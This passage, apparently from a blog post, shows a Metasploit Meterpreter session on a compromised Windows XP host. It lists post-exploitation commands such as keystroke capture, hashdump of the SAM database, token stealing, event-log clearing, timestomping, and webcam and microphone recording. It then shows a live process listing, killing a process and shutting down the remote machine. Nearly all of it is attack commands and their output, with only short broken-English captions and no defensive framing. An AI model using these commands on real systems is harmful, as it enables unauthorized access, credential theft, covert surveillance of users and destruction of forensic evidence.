getlwd Print local working
directory
getwd Print working
directory
lcd Change local working
directory
lpwd Print local working
directory
ls List files
mkdir Make directory
pwd Print working
directory
rm Delete the specified
file
rmdir Remove directory
search Search for files
upload Upload a file or
directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port
to a remote service
route View and modify the
routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any
active impersonation token.
execute Execute a command
getpid Get the current
process identifier
getprivs Attempt to enable all
privileges available to the current process
getuid Get the user that the
server is running as
kill Terminate a process
ps List running
processes
reboot Reboots the remote
computer
reg Modify and interact
with the remote registry
rev2self Calls RevertToSelf()
on the remote machine
shell Drop into a system
command shell
shutdown Shuts down the remote
computer
steal_token Attempts to steal an
impersonation token from the target process
sysinfo Gets information
about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible
desktops and window stations
getdesktop Get the current
meterpreter desktop
idletime Returns the number
of seconds the remote user has been idle
keyscan_dump Dump the keystroke
buffer
keyscan_start Start capturing
keystrokes
keyscan_stop Stop capturing
keystrokes
screenshot Grab a screenshot of
the interactive desktop
setdesktop Change the
meterpreters current desktop
uictl Control some of the
user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the
default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from
the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate
your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of
the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE
attributes
Process 1452 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
- Copyright 1985-2001 Microsoft Corp.
to see taksmanager in windows had
exploitasi
meterpreter > ps
Process list
============
PID Name Arch Session
User Path
--- ---- ---- -------
---- ----
0 [System Process]
1048 svchost.exe x86 0
NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1060 wpabaln.exe x86 0
XP\HP C:\WINDOWS\system32\wpabaln.exe
1080 svchost.exe x86 0
NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1392 spoolsv.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 explorer.exe x86 0
XP\HP C:\WINDOWS\Explorer.EXE
232 cmd.exe x86 0
XP\HP C:\WINDOWS\system32\cmd.exe
356 smss.exe x86 0
NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0
NT AUTHORITY\SYSTEM
496 cmd.exe x86 0
XP\HP C:\WINDOWS\system32\cmd.exe
552 wscntfy.exe x86 0
XP\HP C:\WINDOWS\system32\wscntfy.exe
568 csrss.exe x86 0
NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
592 winlogon.exe x86 0
NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
636 services.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
648 lsass.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
804 svchost.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
836 alg.exe x86 0
NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
884 svchost.exe x86 0
NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
984 svchost.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
too kill procces in windows had
exploitasi
meterpreter > kill 232
Killing: 232
Shutdown Windows
meterpreter > shutdown
No comments:
Post a Comment